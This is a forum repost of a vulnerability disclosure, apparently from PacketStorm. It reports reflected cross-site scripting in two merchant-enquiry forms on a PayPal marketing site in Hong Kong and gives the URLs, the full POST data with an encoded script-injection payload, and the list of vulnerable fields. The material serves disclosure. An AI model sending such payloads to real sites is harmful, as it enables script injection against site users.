Jump to content
Praetorian503

Paypal Marketing Cross Site Scripting

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

The www.paypal-marketing.com.hk site suffers from multiple cross site scripting vulnerabilities.

--- Vulnerability # No-  1:
+URL:  https://www.paypal-marketing.com.hk/merchant-enquiries/index.php
+Vulnerability Type:  Cross Site Scripting (XSS)
+ Form Action : POST
+POST Data Sent to Produce the Bug :

token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1

--Here, the field name with field value vulnerable_field are all vulnerable
to cross site scripting .

And, the filed name (company_name)  with value
%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used
here to produce the XSS bug here .
+POST Parameters that cause XSS Vulnerability in this Page :
company_name , business_type_other,business_need_other, contact_person
,contact_person2, phone,phone2, email,email2

+How to fix :
-- Though this page uses a java script function to validate this form, but
it fails to sanitize the all characters which could allow hackers or pen
testers to  return malicious on webpage like Cross Site Scripting attack
+ Screenshot : Attached with this mail

----------------------------------------------------------------------------
Vulnerability No. #  2 :
+URL:  https://www.paypal-marketing.com.hk/merchant-enquiries/index-zh.php
+Vulnerability Type:  Cross Site Scripting (XSS)
+ Form Action : POST
+POST Data Sent to Produce the Bug :

token=1359557986&from_page=en&company_name=%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E&business_type_other=vulnerable_field&business_need_other=vulnerable_field&contact_person=vulnerable_field&contact_person2=vulnerable_field&phone=vulnerable_field&phone2=vulnerable_field&email=vulnerable_field&email2=vulnerable_field&business_type=1

--Here, the field name with field value vulnerable_field are all vulnerable
to cross site scripting .

And, the filed name (company_name)  with value
%22%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E is also vulnerable and used
here to produce the XSS bug here .
+POST Parameters that cause XSS Vulnerability in this Page :
company_name , business_type_other,business_need_other, contact_person
,contact_person2, phone,phone2, email,email2

+How to fix :
-- Though this page uses a java script function to validate this form, but
it fails to sanitize the all characters which could allow hackers or pen
testers to  return malicious on webpage like Cross Site Scripting attack
+ Screenshot : Attached with this mail

Thanking You
Mahadev Subedi

Source: PacketStorm

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...